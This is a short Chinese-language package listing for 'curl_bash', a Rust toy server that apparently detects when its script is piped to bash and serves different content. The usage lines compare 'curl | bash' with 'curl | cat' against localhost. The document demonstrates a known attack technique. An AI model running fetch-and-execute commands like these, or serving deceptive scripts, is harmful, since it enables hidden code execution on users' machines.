1 个不稳定版本
0.1.0 | 2019年2月16日 |
---|
#38 在 #curl
16KB
223 行
curl_bash
对 curl | bash 执行器进行恶意操作。
灵感来自 https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/,更多的是作为一种用 Rust 编写东西的有趣方式,而不是一个有用的工具。
用法
curl_bash
curl -sSkvhttps://127.0.0.1:5555/setup.bash | bash
curl -sSkvhttps://127.0.0.1:5555/setup.bash | cat
curl -sSkvhttps://127.0.0.1:5555/setup.bash | cat -v
许可证
GNU/AGPLv3 - 详细信息请查看 LICENSE.md